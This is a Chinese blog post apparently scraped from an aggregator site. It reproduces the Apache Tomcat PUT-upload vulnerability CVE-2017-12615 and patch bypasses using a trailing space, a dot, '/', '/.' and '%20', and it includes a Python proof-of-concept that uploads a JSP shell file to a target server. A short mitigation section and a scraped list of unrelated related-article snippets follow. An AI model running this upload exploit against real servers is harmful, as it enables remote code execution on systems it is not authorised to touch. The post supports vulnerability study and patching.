2. 程式人生 > >Tomcat代碼執行漏洞(CVE-2017-12615)的演繹及個人bypass

Tomcat代碼執行漏洞(CVE-2017-12615)的演繹及個人bypass

阿新 發佈:2017-09-21
ros star quest odi -s 官方 argv 特性 ~~

0x00 漏洞簡介

2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞。

漏洞CVE編號:CVE-2017-12615和CVE-2017-12616。

其中 遠程代碼執行漏洞(CVE-2017-12615)

影響: Apache Tomcat 7.0.0 - 7.0.79

漏洞觸發條件:

1,tomcat得架設在windows主機上

2,將readonly由默認值true設置為false。(開啟http PUT 方法)

攻擊者將有可能可通過精心構造的攻擊請求向服務器上傳包含任意代碼的 JSP 文件。之後,JSP 文件中的代碼將能被服務器執行。

該漏洞由360觀星實驗室發現並提交。

官方在確認漏洞並在tomcat 7.0.81中修復。

0x01 漏洞演繹:漏洞復現

需要的環境:

1,tomcat 版本低於7.0.81

2,burpsuite

官網上在7.0.81出來之後就找不到低於該版本的了,在csdn下了一個7.0.65的免安裝版。

jdk的配置與及環境變量的配置就不多說了。配置好conf/web.xml的readonly 為 false。如下圖

技術分享

startup啟動tomcat,環境就算搭好了。

漏洞利用姿勢有兩種:

1,利用windows對文件名的要求特性。倘若文件名最後的一個字符是空格或者點號,會被自動去掉。

利用空格


技術分享

利用點號

技術分享

2,利用windows的ntfs文件流特性。關於文件流請看這裏(https://msdn.microsoft.com/en-us/library/dn393272.aspx)

技術分享

至於原理可以參考先知的分析(http://mp.weixin.qq.com/s/wWkb079hUYOwDgVQqEqGZQ)

0x02 漏洞演繹:bypass 補丁

在各方大佬對官方的的補丁進行分析,fuzz之後,發現了在文件名後加多一個‘/‘ 或者‘/.‘,可以直接bypass 補丁,攻擊範圍也從僅限於的windows擴展到windows和linux,漏洞影響版本也從僅影響7.x版本,直接日穿5.x到9.x所有版本。

漏洞影響:

版本:5.x-9.x

平臺:windows,linux

bypass 補丁環境準備:

1,tomcat 7.0.81

2,burpsuite

修改好readonly,開始測試。

利用‘/‘

技術分享

利用‘/.‘

技術分享

0x03 漏洞演繹:我的bypass

在對多個版本進行復現,測試的時候,我也發現了一個‘bypass‘,有些雞肋,充其量應該算是補丁的缺陷吧。

1,版本僅限於7.0.81;

2,平臺僅限於windows;

bypass 思路:先put請求一個服務器上面存在的jsp文件,如index.jsp%20,再put 我們自己的shell.jsp%20,神奇的發現創建了shell.jsp。測試了很久,發現只有%20可以過。

比如tomcat服務器上肯定存在index.jsp。

先put index.jsp%20 ,提示409

技術分享

再put shell.jsp%20,可以發現成功創建了shell.jsp

技術分享

在用burpsuite測試的時候,時不時會過不了。

寫了個腳本,思路就清晰了不少。

 1 #-*- coding:utf-8 -*-
 2 
 3 import requests
 4 import sys
 5 import random
 6 
 7 
 8 body = <%out.println("hello ! This is my bypass shell");%>
 9 
10 urltemp = http://+sys.argv[1]+/index.jsp%20 # put the exists jsp,like the index.jsp
11 shellname = shell+str(random.randint(1000,10000))
12 
13 urlpoc = http://+sys.argv[1]+/+shellname+.jsp%20
14 
15 urlnormal =  http://+sys.argv[1]+/+shellname+.jsp
16 
17 
18 requests.put(urltemp,body)
19 
20 response = requests.put(urlpoc,body)
21 
22 code =  response.status_code
23 
24 if code== 201:
25     print shell create;
26 
27 response = requests.get(urlnormal)
28 code = response.status_code
29 if code == 200:
30     print Your shell: +urlnormal

腳本是穩定的:

技術分享

至於為什麽會出現這種問題,得好好跟一下才知道了~~

0x04 修復方案

認真檢查tomcat 配置是否設置了readonly為false或者是否啟用了PUT方法,設置readonly為true,禁用PUT方法!!

留意官方的最新補丁,及時升級!!

參考文章:

1,Tomcat 遠程代碼執行漏洞分析(CVE-2017-12615)及補丁 Bypass(http://www.freebuf.com/vuls/148283.html)

2,Tomcat信息泄漏和遠程代碼執行漏洞分析報告(CVE-2017-12615/CVE-2017-12616)(https://mp.weixin.qq.com/s/wWkb079hUYOwDgVQqEqGZQ)

Tomcat代碼執行漏洞(CVE-2017-12615)的演繹及個人bypass

相關推薦

Tomcat執行漏洞(CVE-2017-12615)的演繹個人bypass

ros star quest odi -s 官方 argv 特性 ~~ 0x00 漏洞簡介 2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞。 漏洞CVE編號:CVE-2017-12615和CVE-2017-12616。 其中 遠程代碼執行漏洞(

Office遠程執行漏洞CVE-2017-0199復現

read 方式 觀察 data n3k -s 執行 rip 最大限度 在剛剛結束的BlackHat2017黑帽大會上,最佳客戶端安全漏洞獎頒給了CVE-2017-0199漏洞,這個漏洞是Office系列辦公軟件中的一個邏輯漏洞,和常規的內存破壞型漏洞不同,這

Samba遠程執行漏洞(CVE-2017-7494)復現

one hub 4.6 修改配置 自己 tree bpa wid 找到   簡要記錄一下Samba遠程代碼執行漏洞(CVE-2017-7494)環境搭建和利用的過程,獻給那些想自己動手搭建環境的朋友。(雖然已過多時)   快捷通道:Docker ~ Samba遠程代碼

Chrome 遠程執行漏洞CVE-2019-5786-EXP

代碼執行 一個 art eas 避免 返回 class 參考 release 0x01 漏洞原理 CVE-2019-5786是位於FileReader中的UAF漏洞,由Google’s Threat Analysis Group的Clement Lecigne於2019-0

Apache Tomcat CVE-2017-12615遠程執行漏洞分析

文件 only html ive zip pre clas one 判斷 2017年9月19日, Apache Tomcat官方發布兩個嚴重的安全漏洞, 其中CVE-2017-12615為遠程代碼執行漏洞,通過put請求向服務器上傳惡意jsp文件, 再通過jsp文件在服

LNK文件(快捷方式)遠程執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

Microsoft Edge 瀏覽器遠程執行漏洞POC細節(CVE-2017-8641)

ive buffer png serer virt pil binding nproc mil 2017年8月8日,CVE官網公布了CVE-2017-8641,在其網上的描述為: 意思是說,黑客可以通過在網頁中嵌入惡意構造的javascript代碼,使得微軟的瀏覽器(如E

Office CVE-2017-8570遠程執行漏洞復現

pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

隱藏17年的Office遠程執行漏洞CVE-2017-11882)

portal round splay avi uid windows 1.10 分享 ret Preface   這幾天關於Office的一個遠程代碼執行漏洞很流行,昨天也有朋友發了相關信息,於是想復現一下看看,復現過程也比較簡單,主要是簡單記錄下。   利用腳本Git

Office CVE-2017-8570 遠程執行漏洞復現

CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。 0x00介紹CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,

Samba遠程執行漏洞CVE-2017-7494) 復現

51cto ucc 協議 samba配置文件 finished arc tin epo type 漏洞背景:Samba是在Linux和UNIX系統上實現SMB協議的一個軟件,2017年5月24日Samba發布了4.6.4版本,中間修復了一個嚴重的遠程代碼執行漏洞,漏洞編號C

PHPMailer < 5.2.18 遠程執行漏洞CVE-2016-10033)

com ifconf github cnblogs grep main src avi https PHPMailer < 5.2.18 Remote Code Execution    本文將簡單展示一下PHPMailer遠程代碼執行漏洞(CVE-2016-100

Git任意執行漏洞檢測與修復(CVE-2018-11235)

Git任意代碼執行 漏洞修復檢測漏洞方法 檢測漏洞有兩種方法: 1.通過查看git客戶端版本 git --version 如果版本低於2.13.7肯定存在漏洞如果版本高於2.13.7請比對下面的版本 版本2.13.x,小於2.13.7則存在漏洞版本2.14.x ,小於 2.14.4則存在漏洞版本2.15.x,

WebLogic 任意文件上傳 遠程執行漏洞CVE-2018-2894)------->>>任意文件上傳檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

Tomcat任意檔案上傳漏洞CVE-2017-12615復現測試

今天爆出了一個tomcat7的任意檔案上傳漏洞,看了大牛們的分析後,我自己本地搭建環境複測。 漏洞影響的tomcat版本為tomcat7.0.0-7.0.81版本 我本地下載的是tomcat7.0.5

Nexus Repository Manager 3(CVE-2019-7238) 遠程執行漏洞分析和復現

下載鏈接 例子 conf bash 動態 本地 簡單的 article detail 0x00 漏洞背景 Nexus Repository Manager 3是一款軟件倉庫,可以用來存儲和分發Maven,NuGET等軟件源倉庫。其3.14.0及之前版本中,存在一處基於Or

Jenkins遠程執行漏洞

查看 過程 com 漏洞 all 用戶 運行 最新 style 於一個月前,進行服務器巡檢時,發現服務器存在不明進程,並且以Jenkins用戶身份來運行.當時進行了處理並修復了漏洞.在此補上修復過程 第一反應是Jenkins存在漏洞,於是Google Jenkins漏洞,瞬

http.sys遠程執行漏洞(MS15-034)

bsp 描述 style windows zh-cn port c代碼 win pan 0x01漏洞描述 遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者

OrientDB遠程執行漏洞利用與分析

orientdb遠程代碼執行漏洞利用與分析原文見:http://zhuanlan.51cto.com/art/201708/548641.htm本文出自 “simeon技術專欄” 博客,請務必保留此出處http://simeon.blog.51cto.com/18680/1958277OrientDB遠程代碼

Apache ActiveMQ Fileserver遠程執行漏洞

.org tail 自己 run reader 一句話 遠程 ring 成功   掃端口的時候遇到8161端口,輸入admin/admin,成功登陸,之前就看到過相關文章,PUT了一句話上去,但是沒有什麽效果,於是本地搭建了一個環境,記錄一下測試過程。 環境搭建: Acti